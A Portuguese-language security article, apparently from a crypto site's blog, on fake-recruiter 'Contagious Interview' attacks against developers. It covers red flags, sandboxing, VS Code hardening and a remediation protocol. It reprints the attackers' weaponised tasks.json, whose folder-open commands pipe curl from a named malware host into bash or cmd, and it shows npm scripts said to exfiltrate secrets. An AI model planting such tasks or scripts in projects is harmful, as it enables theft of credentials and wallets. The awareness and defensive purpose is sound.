A Entrevista Contagiosa: Como Falsos Recrutadores Hackeiam Desenvolvedores

Resumo: Uma nova onda de ataques patrocinados por estados está mirando desenvolvedores seniores em cripto. Golpistas se passam por recrutadores ou CTOs e fazem o candidato abrir código malicioso. Este artigo disseca o caso "Martin Erazo", o exploit "tasks.json" do VS Code e o "Protocolo de Queima" necessário para sobreviver.
Aviso Legal: Este artigo relata incidentes de cibersegurança específicos envolvendo a representação de indivíduos reais. Os nomes "Martin Erazo" e "Ara Vartanian" referem-se a personas ou identidades usadas pelos atacantes. Acreditamos que as pessoas reais com esses nomes são vítimas inocentes de roubo de identidade e não estão envolvidas nessas atividades maliciosas.
Prompts Midjourney
/imagine prompt: A dark, moody cybersecurity visualization of a developer's workstation, a red "WARNING" hologram projecting from a VS Code terminal, malicious code tendrils reaching for a crypto wallet icon, text "Contagious Interview" --ar 16:9/imagine prompt: A split screen composition. Left side: A friendly LinkedIn recruiter profile. Right side: A hacker in a hoodie executing a script, matrix code rain in background, text "Social Engineering" --ar 16:9/imagine prompt: A digital shield protecting a laptop, "VS Code Hardening" concept, sleek blue and white cybernetics, defending against red laser attacks --ar 16:9
1. A Isca Perfeita: A Persona "Martin Erazo"
Começa com uma mensagem que atinge todos os pontos certos para um engenheiro sênior:
- Cargo: CTO / Arquiteto Líder.
- Orçamento: $6M de financiamento garantido.
- Tecnologia: Web3, IA, Infraestrutura Descentralizada.
Em ataques recentes confirmados, um recrutador usando o nome "Martin Erazo" entra em contato via LinkedIn. O perfil usa o nome e a foto de um diretor de teatro real, mas o histórico de trabalho foi forjado para mudar repentinamente para "Gerenciamento de Projetos de TI" em 2025 — um sinal clássico de conta hackeada ou comprada.
O golpe se move rápido. Eles pulam a triagem padrão de RH e vão direto para uma "entrevista técnica" com a alta gestão — neste caso, personificando o CTO real da indústria Ara Vartanian (atualmente na Limit Break).
Bandeira Vermelha: O nome do projeto muda constantemente. O recrutador vende o "Betfin" (uma plataforma GameFi), mas o deck de apresentação fornecido é para o "SpaceXView" (um projeto de metaverso). Essa inconsistência é a prova de que os golpistas estão reciclando ativos em diferentes campanhas.

2. A Armadilha: "Revise nosso Código MVP"
O falso "CTO" afirma que precisa dos seus olhos experientes no código MVP deles. Eles enviam um link para um repositório GitHub ou um arquivo ZIP. Eles te pressionam para abri-lo durante a entrevista ou imediatamente depois.
É aqui que o ataque acontece.
Eles exploram sua prestatividade e seu ego. Você acha que está lá para encontrar bugs em componentes React. Na realidade, o bug é uma "funcionalidade" projetada para drenar suas economias.
3. O Exploit Técnico: Malware Zero-Click
Os atacantes usam vulnerabilidades "zero-click" ou de "baixo clique" mirando ferramentas de desenvolvimento. Eles não precisam que você execute o aplicativo. Eles só precisam que você abra a pasta.
A Arma Fumegante: .vscode/tasks.json
Neste caso específico, o repositório incluía um arquivo .vscode/tasks.json armado. Este arquivo diz ao VS Code como construir o projeto.
O Código Malicioso:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Este é o gatilho fatal. No momento em que você abre a pasta no VS Code, essa tarefa é executada automaticamente.
- A Carga: Ela usa curl para baixar um script de
vscodesettingtask.vercel.app— um host de malware conhecido disfarçado de API de configurações. - O Resultado: O script roda na memória e rouba instantaneamente senhas do Chrome, cookies de sessão e chaves SSH.
Plano B: Scripts package.json
Se o exploit do VS Code falhar, eles planta scripts npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Executar npm install ou npm start aciona server/server.js — um script C2 (Comando e Controle) local que exfiltra suas variáveis de ambiente (Chaves AWS, Seeds de Carteira) para o atacante.
4. Bandeiras Vermelhas vs Bandeiras Verdes
Como detectar isso antes de ser tarde demais?
Se você é um desenvolvedor, "repositórios privados" ou arquivos ZIP devem te deixar em alerta máximo. Empresas legítimas usam repositórios públicos ou tarefas de casa através de plataformas padrão.
Aviso: Esta não é a única maneira de desenvolvedores serem atacados. Leia sobre a Armadilha do Colaborador no Discord e como Ataques à Cadeia de Suprimentos comprometem dependências.
| 🚩 Bandeira Vermelha (Corra) | ✅ Bandeira Verde (Seguro) |
|---|---|
| Código Primeiro: Enviam código antes de qualquer oferta. | Processo Padrão: Entrevista primeiro, código depois. |
| Identidade Quebrada: Recrutador não tem histórico relevante (ex: Artista virou Gerente de TI). | Histórico Verificado: Carreira LinkedIn consistente. |
| Inconsistência: O nome do projeto não bate (Betfin vs SpaceXView). | Consistência: Nome, docs e site alinhados. |
| Urgência: "O CTO está esperando", "Abra agora". | Paciência: Respeitam seu tempo e agenda. |
| Email Pessoal: [email protected] ou domínio errado. | Email Corporativo: [email protected] (com registros MX ativos). |
5. Protocolo de Segurança: Como Entrevistar com Segurança
Se você é um desenvolvedor sênior, você será alvo. Endurecer seu ambiente é obrigatório.
Protocolo 1: O Ambiente "Burner" (Descartável)
NUNCA use sua estação de trabalho principal para testes de código.
- Máquinas Virtuais: Use VirtualBox ou VMWare.
- IDEs na Nuvem: Use GitHub Codespaces ou Gitpod. Eles são efêmeros e isolados dos arquivos da sua carteira local.
Protocolo 2: Auditoria Forense
Antes de sequer abrir código desconhecido:
- Cheque .vscode/tasks.json: Procure por
runOn: folderOpen. - Cheque package.json: Procure por scripts preinstall ou postinstall suspeitos.
- Busca de Palavras-Chave: Faça um grep por
curl,wget,os.homedir(),.ssh,wallet.
Protocolo 3: Endurecimento do VS Code
Desative "Confiança no Workspace" (Workspace Trust) globalmente.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
- Isso força o VS Code a pedir permissão antes de executar qualquer tarefa em nível de pasta.

6. Remediação: "O Protocolo de Queima"
Se você abriu um repositório malicioso (como o enviado pela persona "Martin Erazo"), assuma que está comprometido. Restaurar o sistema não é suficiente.
- Corte a Conexão: Desconecte o cabo ethernet imediatamente.
- Queime as Carteiras: Suas chaves privadas foram perdidas. Crie novas carteiras em um dispositivo limpo (celular) e mova quaisquer fundos restantes. Nunca mais use as seeds antigas.
- Mate as Sessões: Saia de todos os dispositivos no Google, GitHub, AWS. Revogue todas as sessões ativas.
- Auditoria de Chaves SSH: Verifique suas configurações de GitHub/GitLab. Atacantes frequentemente adicionam as chaves SSH deles para manter acesso backdoor. Apague qualquer chave que não reconheça.
- Destruição Total (Nuke It): Limpe o drive e reinstale o SO. É a única maneira de ter 100% de certeza de que rootkits se foram.
Conclusão
O golpe da "Entrevista Contagiosa" arma sua própria expertise contra você. Ele mira sua vontade de resolver problemas. Mas na Web3, paranoia é uma virtude profissional. Verifique cada identidade, coloque em sandbox cada repositório e nunca confie em um "recrutador" que tem pressa para que você escreva código.
Pronto para Colocar Seu Conhecimento em Prática?
Comece a negociar com confiança alimentada por IA hoje
ComeçarArtigos Relacionados
O Golpe Longo (Abate de Porcos): Como Eles Roubam Seu Coração e Sua Carteira
Começa com um SMS de 'Número Errado'. Termina com a perda da sua aposentadoria. Uma anatomia do roteiro psicológico do golpe 'Pig Butchering'.
Não Negocie Onde Você Joga: O Caso do Dispositivo Cripto Dedicado
Seu PC gamer está cheio de brechas. Seu celular está cheio de rastreadores. Por que gastar $200 em um 'Dispositivo Bancário' dedicado é a melhor apólice de seguro que você pode comprar.
A Porta dos Fundos Oculta: Por Que Você Precisa Revogar Permissões
Você desconectou sua carteira, mas o hacker ainda pode drená-la. Entenda como funcionam as 'Aprovações Ilimitadas' e como trancar sua porta digital dos fundos.
